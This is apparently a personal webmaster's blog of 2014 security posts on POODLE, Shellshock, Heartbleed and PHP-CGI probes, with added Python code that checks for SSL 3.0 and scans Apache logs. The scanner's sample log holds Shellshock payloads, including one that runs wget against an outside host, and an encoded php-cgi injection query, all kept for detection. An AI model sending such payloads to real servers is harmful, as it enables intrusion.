Memorandum #7.

Update information      Edit(Oct.18)

   Have you already handled the “POODLE” issue, i.e. CVE-2014-3566? The OpenSSL Security Advisory [15 Oct 2014] is also related to it.

   First, as a web site operator:
   I haven’t got the new version built with OpenSSL 1.0.1j from Apache Lounge yet, so I applied the workaround I read in “SSL v3 goes to the dogs – POODLE kills off protocol”.

   I added SSLProtocol All -SSLv3 to my httpd-ssl.conf and restarted httpd.exe. Before this, SSL Server Test told me “This server is vulnerable to the POODLE attack. If possible, disable SSL 3 to mitigate. Grade capped to C”. After this, it told me “This server is not vulnerable to the POODLE attack because it doesn’t support SSL 3”. I use Apache 2.4 with OpenSSL 1.0.1, so in my mod_ssl ‘SSLProtocol all’ means ‘SSLProtocol +SSLv3 +TLSv1 +TLSv1.1 +TLSv1.2’, according to the SSLProtocol directive documentation. That is why plain ‘all’ left SSL 3 enabled.
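   Two checks for the same change, added here as an example; this is not code from the original post, from Apache, or from Apache Lounge’s build. The first expands an SSLProtocol line the way mod_ssl on Apache 2.4 / OpenSSL 1.0.1 does, so you can see that plain ‘all’ still includes SSLv3 before you restart anything. The second does what SSL Server Test does on the wire: it sends a hand-built SSL 3.0 ClientHello and reads the server’s first record. The host name comes from the command line, the cipher-suite list and the two configuration lines are constructed for the example.

```python
"""Two ways to confirm SSL 3.0 is really off after 'SSLProtocol All -SSLv3'.

1. effective_protocols() expands an SSLProtocol line the way mod_ssl on
   Apache 2.4 / OpenSSL 1.0.1 does ('all' = SSLv3 + TLSv1 + TLSv1.1 + TLSv1.2,
   never SSLv2), so you can see what a config line enables before a restart.
2. build_sslv3_client_hello() / classify_response() talk to the server the way
   a scanner does. Current Python and OpenSSL builds no longer offer
   PROTOCOL_SSLv3, so the ClientHello is assembled by hand from the SSL 3.0
   record layout.
"""
import os
import socket
import struct

KNOWN = ("SSLv2", "SSLv3", "TLSv1", "TLSv1.1", "TLSv1.2")
ALL_EXPANDS_TO = KNOWN[1:]          # what 'all' means on this Apache/OpenSSL pair


def effective_protocols(config_text):
    """Return the set of protocols enabled by the last SSLProtocol line seen.

    Tokens follow mod_ssl: 'name' or '+name' adds, '-name' removes, 'all'
    stands for ALL_EXPANDS_TO; directive and token names are case-insensitive.
    """
    canon = {name.lower(): name for name in KNOWN}
    enabled = set()
    for line in config_text.splitlines():
        tokens = line.split("#", 1)[0].split()
        if not tokens or tokens[0].lower() != "sslprotocol":
            continue
        enabled = set()                     # a later directive replaces the earlier one
        for tok in tokens[1:]:
            sign, name = (tok[0], tok[1:]) if tok[0] in "+-" else ("+", tok)
            names = ALL_EXPANDS_TO if name.lower() == "all" else (name,)
            for n in names:
                if n.lower() not in canon:
                    raise ValueError("unknown SSLProtocol token: " + tok)
                (enabled.add if sign == "+" else enabled.discard)(canon[n.lower()])
    return enabled


# Cipher suites an SSL 3.0 server of 2014 would accept (constructed list):
# AES256-SHA, AES128-SHA, DES-CBC3-SHA, RC4-SHA, RC4-MD5.
SSLV3_SUITES = (0x0035, 0x002F, 0x000A, 0x0005, 0x0004)


def build_sslv3_client_hello():
    """Build a ClientHello record whose record and hello versions are both 3.0."""
    body = (b"\x03\x00"                                   # client_version SSL 3.0
            + os.urandom(32)                              # client random
            + b"\x00"                                     # empty session id
            + struct.pack("!H", 2 * len(SSLV3_SUITES))
            + b"".join(struct.pack("!H", s) for s in SSLV3_SUITES)
            + b"\x01\x00")                                # one compression method: null
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body   # type 1, 24-bit length
    return b"\x16\x03\x00" + struct.pack("!H", len(handshake)) + handshake


def classify_response(data):
    """Judge the first record the server sends back.

    'vulnerable': a ServerHello negotiating version 3.0 (SSL 3 still on).
    'refused':    an alert, or nothing at all, which is what 'All -SSLv3' yields.
    'unknown':    anything else (not TLS, truncated, a different version).
    """
    if not data:
        return "refused"
    if len(data) < 6:
        return "unknown"
    if data[0] == 0x15:                                   # alert record
        return "refused"
    if data[0] == 0x16 and data[1:3] == b"\x03\x00" and data[5] == 0x02:
        if len(data) >= 11 and data[9:11] == b"\x03\x00":  # version inside ServerHello
            return "vulnerable"
    return "unknown"


def probe_sslv3(host, port=443, timeout=5.0):
    """Send the SSL 3.0 ClientHello to a live server and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_sslv3_client_hello())
        try:
            data = sock.recv(4096)
        except (socket.timeout, ConnectionResetError):
            data = b""
    return classify_response(data)


if __name__ == "__main__":
    import sys
    for line in ("SSLProtocol all", "SSLProtocol All -SSLv3"):   # constructed config lines
        print("%-25s -> %s" % (line, sorted(effective_protocols(line))))
    if len(sys.argv) > 1:                                         # python poodle_check.py www.example.com
        print(sys.argv[1], "->", probe_sslv3(sys.argv[1]))
```

   Run it with a host name to probe a live server; with no argument it only prints what the two configuration lines enable. Removing SSL 3 on the server is the mitigation SSL Server Test looks for; the TLS_FALLBACK_SCSV support that OpenSSL 1.0.1j adds only stops a client from being downgraded to a version the server still offers, so it is not a substitute for taking SSLv3 out of SSLProtocol.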

   Second, as a user:
   I applied the following workaround. See “How to protect your browser”.

Edit(Oct.18):
 PHP 5.6.1 —>> PHP 5.6.2 ChangeLog.
 phpMyAdmin 4.2.9.1 —>> phpMyAdmin 4.2.10 ChangeLog.

ShellShock, shock shock shock!

Update information      Edit(Sep.30)    Edit2(Oct.6)

   Whew!!
   Have you coped with the ShellShock threat yet? My server runs on Windows, so I think the vulnerability has no effect on it. But it is a very serious one: NVD gave it an impact score of 10. I have CentOS 6.5 on VMware, so I updated its bash to bash-4.1.2-15.el6_5.2.i686.

   If, after updating, running
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
   still gives you the following messages, your bash needs more updating:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for 'x'
this is a test

   I got this information from Masanari Iida’s comment on the Red Hat Customer Portal.

   Several links I am curious about; actually there are tons of articles about it on the Internet:

   By the way, as of yesterday I had seen ShellShock attacks six times in the Apache error log and blocked their IPs, and today two more from other IPs so far. My Apache returned HTTP error codes to all of them.

Edit(Sep.30):
   In “Bash bug: apply Florian’s patch now” he said “I very strongly recommend manually deploying Florian’s patch unless your distro is already shipping it.” and explained how to check whether the patch has been applied.

   When you run foo='() { echo not patched; }' bash -c foo in the shell, the patch is already applied if you get “command not found”. If you get “not patched”, your bash is still vulnerable.

   In its comments vdp wrote “These ‘toughen the feature’ patches still feel quite scary.” and made a suggestion. I agree with him.

Edit2(Oct.6):
   Today, I’ve found this (Japanese).

   Woooo!
   It says that it is not enough to check bash with the command foo='() { echo not patched; }' bash -c foo. Nonetheless, the remaining bugs are less critical than CVE-2014-6271 or CVE-2014-7169. But they are still dangerous.

Microsoft Security Advisory 2915720-#2

   Do you remember my post “Microsoft Security Advisory 2915720 ???”? Now August 12 is approaching, so I wondered how it was going. For about a week my translation work was getting down to the wire in my mind, so I missed the new revision of Microsoft Security Advisory 2915720, but I suddenly found it yesterday.

   The conclusion is: “Microsoft no longer plans to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows.” But they also say “It remains available as an opt-in feature.”

   According to the well-informed, they were keenly reminded that its effects were more severe than expected, and so they gave it up for now.

I’ve got an email from No-IP.

Update information      Edit(Jul.11)

   I got an email from No-IP because I use a No-IP domain for my net radio. Its title is ★ Update to Microsoft Takedown – All Domains Restored ★. Of course, it is related to “Microsoft takes on global cybercrime epidemic in tenth malware disruption”. The original article is gone, so I link to the copy in the Internet Archive (2014.9.24).

The email from No-IP

   Hey, No-IP! Are you doing OK now?

Edit(Jul.11):
   Today, I have the second email from No-IP.

The email #2 from No-IP

   No-IP gives us more information on the page “Update: Details on Microsoft Takeover”.

   Anyway, congratulations for surviving, No-IP.

Updating Apache because of OpenSSL Security Advisory [05 Jun].

Update information      Edit(Jun.9)

   I updated my Apache 2.4.9 to the 5 Jun 2014 build because of the OpenSSL Security Advisory [05 Jun].

   It is built with ‘IPv6 Crypto apr-1.5.0 apr-util-1.5.3 apr-iconv-1.2.1 openssl-1.0.1h zlib-1.2.8 pcre-8.34 libxml2-2.9.1 lua-5.1.5 expat-2.1.0’. Its Changelog.

   I really appreciate Steffen’s hard and quick work. Thanks again, Steffen.

Edit(Jun.9):
   I found this on the Net, so I link to it as a reference.
OpenSSL Patches Critical Vulnerabilities Two Months After Heartbleed

Microsoft Security Advisory 2915720 ???

   Now it is June. In Microsoft Security Advisory 2915720 they announced “Changes in Windows Authenticode Signature Verification”; the Advisory was first published on 10 Dec. 2013. They said “The change is included with Security Bulletin MS13-098, but will not be enabled until June 11, 2014.” and suggested these actions.

   So I tested my PCs with “EnableCertPaddingCheck”=“1”. The PCs are a CF-J10 (Win7 HP SP1 64-bit), an NJ2100 (Win8 Pro 32-bit), an xw4200 (Win7 HP SP1 32-bit) and a KeyPaso (Vista Business SP2 32-bit). I have had no trouble so far. Do you know which environments run into trouble with CertPaddingCheck enabled?

   By the way, I found that Microsoft Security Advisory 2915720 was updated on 21 May 2014 and the enabling date changed from June 11 to August 12.

Updating Apache because of CVE-2014-0160.

Update information      Edit(May.13)

   I updated my Apache 2.4.9 to the 8 Apr 2014 build because of CVE-2014-0160.

   It is built with ‘IPv6 Crypto apr-1.5.0 apr-util-1.5.3 apr-iconv-1.2.1 openssl-1.0.1g zlib-1.2.8 pcre-8.34 libxml2-2.9.1 lua-5.1.5 expat-2.1.0’. Its Changelog.

   I really appreciate Steffen’s hard and quick work. Thanks again, Steffen.

Edit(May.13):
   This vulnerability also affects everyday life, as I worried it would. Some smartphone OS versions might have the vulnerability. I found the list. ⇒ The list of Android phones vulnerable to Heartbleed bug

   And you can check your smartphone OS for the vulnerability with the Heartbleed Detector App.

   I add three Heartbleed detector sites you can use from a PC.
     Heartbleed test
     heartbleed test
     Trend Micro Heartbleed Detector (does not exist anymore.)

CVE-2012-1823

   I watched “さくらのVPSに来る悪い人を観察する その2” (Observing the bad guys who come to my Sakura VPS, part 2) and “SSH ハニーポットでの悪い人の観察” (Observing bad guys with an SSH honeypot), then rolled on the floor laughing. I first saw it on “徳丸浩の日記” (Hiroshi Tokumaru’s diary), which says the slide show is very interesting and very popular lately, so I went to the slide show to see for myself and agreed.

   The slide show is related to CVE-2012-1823. Actually, the attacks shown on slide #36 arrive everywhere whether or not the vulnerability exists. My server is no exception. I don’t run an SSH server, and my PHP neither has the vulnerability nor is the CGI version, so all the attacks failed.
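   The ShellShock post above and this one both mention probes that arrive at every server regardless of whether it is vulnerable: the ShellShock requests I blocked by IP, and the php-cgi requests on slide #36. A scanner for both, added here as an example and not code from the original post or from the slides: it reads Apache combined-format access-log lines (the format with referer and user agent, where these probes are visible), flags a bash function prefix in the request line, referer or user agent whether URL-encoded or not, flags a CVE-2012-1823-style option query (no raw ‘=’, decoded query starting with ‘-’), and tallies the source IPs for a block list. The log lines are constructed samples using RFC 5737 test addresses, not lines from the author’s log.

```python
"""Scan Apache combined-format access-log lines for the two probe families
discussed on this page: Shellshock ('() {' in a header) and php-cgi argument
injection (CVE-2012-1823, option-style query with no raw '='). Returns the
hits and a per-IP tally you can turn into a deny list."""
import re
from collections import Counter
from urllib.parse import unquote, unquote_plus

# Combined log format; quoted fields may contain \" escapes as Apache writes them.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")          # the '() {' function-definition prefix

# Constructed sample lines (RFC 5737 test addresses), not from the author's log.
SAMPLE_LOG = r'''203.0.113.5 - - [25/Sep/2014:10:12:31 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 289 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.7/x\""
198.51.100.9 - - [25/Sep/2014:10:13:02 +0900] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E HTTP/1.1" 404 289 "-" "Mozilla/5.0"
192.0.2.33 - - [25/Sep/2014:10:14:40 +0900] "GET /index.php?p=1 HTTP/1.1" 200 5123 "http://example.com/" "Mozilla/5.0"
203.0.113.5 - - [25/Sep/2014:10:15:01 +0900] "GET / HTTP/1.1" 200 1024 "() { :;}; echo vulnerable" "curl/7.30"'''


def is_shellshock(field):
    """True if the header value carries a bash function definition, even URL-encoded."""
    return bool(SHELLSHOCK_RE.search(unquote(field)))


def is_php_cgi_probe(request):
    """True if the request line looks like CVE-2012-1823 abuse.

    php-cgi only turned the query string into argv when it contained no '='
    (which is why attackers encode it as %3D), and the decoded query then
    starts with a php option such as -d or -s."""
    parts = request.split()
    if len(parts) < 2 or "?" not in parts[1]:
        return False
    query = parts[1].split("?", 1)[1]
    return "=" not in query and unquote_plus(query).lstrip().startswith("-")


def scan(lines):
    """Return a list of {ip, kind, status, where} dicts, one per matching line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for where in ("request", "referer", "agent"):
            if is_shellshock(m.group(where)):
                hits.append({"ip": m.group("ip"), "kind": "shellshock",
                             "status": m.group("status"), "where": where})
                break
        else:
            if is_php_cgi_probe(m.group("request")):
                hits.append({"ip": m.group("ip"), "kind": "php-cgi",
                             "status": m.group("status"), "where": "request"})
    return hits


def offenders(hits):
    """Per-IP hit count, most active first; the input for a block list."""
    return dict(Counter(h["ip"] for h in hits).most_common())


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for h in found:
        print("%-14s %-10s status=%s in %s" % (h["ip"], h["kind"], h["status"], h["where"]))
    print("<RequireAll>\n    Require all granted")
    for ip in offenders(found):
        print("    Require not ip " + ip)             # Apache 2.4 block-list fragment
    print("</RequireAll>")
```

   The printed <RequireAll> fragment is the Apache 2.4 form of the per-IP blocking done by hand in the ShellShock post; the status column shows that, as there, the server answered the probes with error codes. Feed it a real log with scan(open(path).read().splitlines()).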

   Ozuma5119 is a genuine white-hat hacker. If you are interested in this topic, visit the linked sites, though they are only in Japanese. Please use a translation service m(_”_)m.

I can’t accept this is happening, but it is true.

   On December 20th, Reuters broke “Exclusive: Secret contract tied NSA and security industry pioneer“. On December 23rd, Mikko Hypponen wrote “An Open Letter to the Chiefs of EMC and RSA“.

   I can’t accept that this is happening, but the fact that Mikko wrote such a letter shows us the article is almost certainly true. For the NSA, it might be their regular job. But for RSA, what a shame!! Of course, we should read not only the Reuters-side articles but also the opposite side’s, like RSA RESPONSE TO MEDIA CLAIMS REGARDING NSA RELATIONSHIP.

   It is a sad fact that RSA’s credibility has been destroyed.

A WordPress Plugin “BulletProof Security”.

Update information      Edit(Dec.2)~~Edit4(2014.Jul.14)    Edit5(Jul.16)

   I installed the plugin “BulletProof Security” for my WordPress security. It is easy to install, but there are some things you should consider when activating it, if you use it too.

  1. Though it is Network / Multisite compatible, you should NOT make it Network Activated. Network Deactivate BulletProof Security and then activate BulletProof Security on your Primary site ONLY.
  2. BulletProof Security uses .htaccess files, so you should back up the original files in your WordPress root and wp-admin folders before activating it.
  3. BulletProof Security uses .htaccess files, so whether you can use it depends on your server configuration. In my case I got an error, so I added Options=Indexes to the AllowOverride directive in the <Directory> section of httpd.conf.

   By the way, I found that BulletProof Security introduces the Sucuri SiteCheck Scanner on one of its pages, so I scanned my WordPress sites with it. No threats were found on the sites, though they say “Sucuri SiteCheck is a free & remote scanner. Although we do our best to provide the best results, 100% accuracy is not realistic, and not guaranteed”.

Edit(Dec.2):
   The plugin ‘Broken Link Checker’ gave me the message below:

   Broken Link Checker has detected 1 new broken link on your site.
   Here’s a list of the new broken links:
   Link text : Asus ,HCL X51C (T12C) Motherboard schematic
   Link URL : /blog-j/files/Asus_HCL_X51C_(T12C).pdf
   Source : ノートをWin8 Proにアップグレード。
   You can see all broken links here: http://My WP dashboard tool URL

   Why suddenly? I uploaded this PDF on Oct. 16 and have not changed it since. I got another message when I accessed the PDF with a browser, like this:

   o6asan.com 403 Forbidden Error Page
   If you arrived here due to a search or clicking on a link click your Browser’s back button
   to return to the previous page. Thank you.

   I found out that this message comes from ‘BulletProof Security’, and also that ‘BulletProof Security’ does not allow access to a file which has ( or ) in its filename. So I renamed Asus_HCL_X51C_(T12C).pdf to Asus_HCL_X51C-T12C.pdf. Now I don’t get the errors. That’s it.

Edit2(Dec.3):
   I got an update to version .49.7 today, and we can now use “Network Activate” on Network / Multisite, even though I just wrote that we couldn’t. Of course you can also keep your old configuration.
   By the way, I’ll add something to Edit(Dec.2): BPS does not allow access to a file which has a space in its file name, either.

Edit3(Dec.4):
   Lately I edit this page every day (^_^;). This time, Mr. ‘BulletProof Security’ blocked my Flash movies. When I accessed 高住神社-video1, I got the you-know-which message “Movie not loaded”. I suspected Adobe Flash Player, because this phenomenon is usually caused by the player. But it is not guilty this time, haha.
   I found this as a solution: Flash swf 403 error – Flash slideshow blocked
   I added the bold italic part to the following lines in the root .htaccess file. That’s it.
   RewriteRule .* index.php [F,L]
   RewriteCond %{REQUEST_URI} (flvplayer\.swf|timthumb\.php|~~|thumbs\.php) [NC]

Edit4(2014.Jul.14):
   Recently I had a lot of 500 Internal Server Errors in my server log. At first it looked related to the font-face decoration, but I finally found that the BPS .htaccess files produced them whenever a URI ends with a ?. I went to the WordPress Japanese forum and the BulletProof Security Free forum and got the solution from them. Now the errors are gone. Happy!!

   If you need more information, please see the following topics.
   IE11(Win8.1),IE10(Win7)で,アクセスしたとき,font.eotについてエラーがでる。 (An error about font.eot occurs when accessing with IE11 (Win8.1) or IE10 (Win7).)
   font-face 500 Internal Server Errors

Edit5(Jul.16):
   I had a lot of 403 Forbidden errors related to my own site in my http_error_log.txt, because the plugin Broken Link Checker uses the HEAD method. I have known that Broken Link Checker uses the HEAD method since 2012.Dec.29. But I want to use both plugins, so I had accepted the situation, because I didn’t know how to fix it.

   However, when I looked through the .htaccess for this 500 Internal Server Error, I found the following lines. Wow!!
# REQUEST METHODS FILTERED
# This filter is for blocking junk bots and spam bots from making a HEAD request, but may also
# block some HEAD request from bots that you want to allow in certain cases. This is not a
# security filter and is just a nuisance filter. This filter will not block any important bots
# like the google bot. If you want to allow all bots to make a HEAD request then remove HEAD
# from the Request Method filter.
# The TRACE, DELETE, TRACK and DEBUG request methods should never be allowed against
# your website.
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK|DEBUG) [NC]
RewriteRule ^(.*)$ - [F,L]

   This means I can remove HEAD from it? I immediately removed HEAD from the .htaccess in my root folder. I left the .htaccess in my wp-admin folder at the default, because Broken Link Checker does not access the wp-admin folder.

   It works very well as I expected (*´▽`*).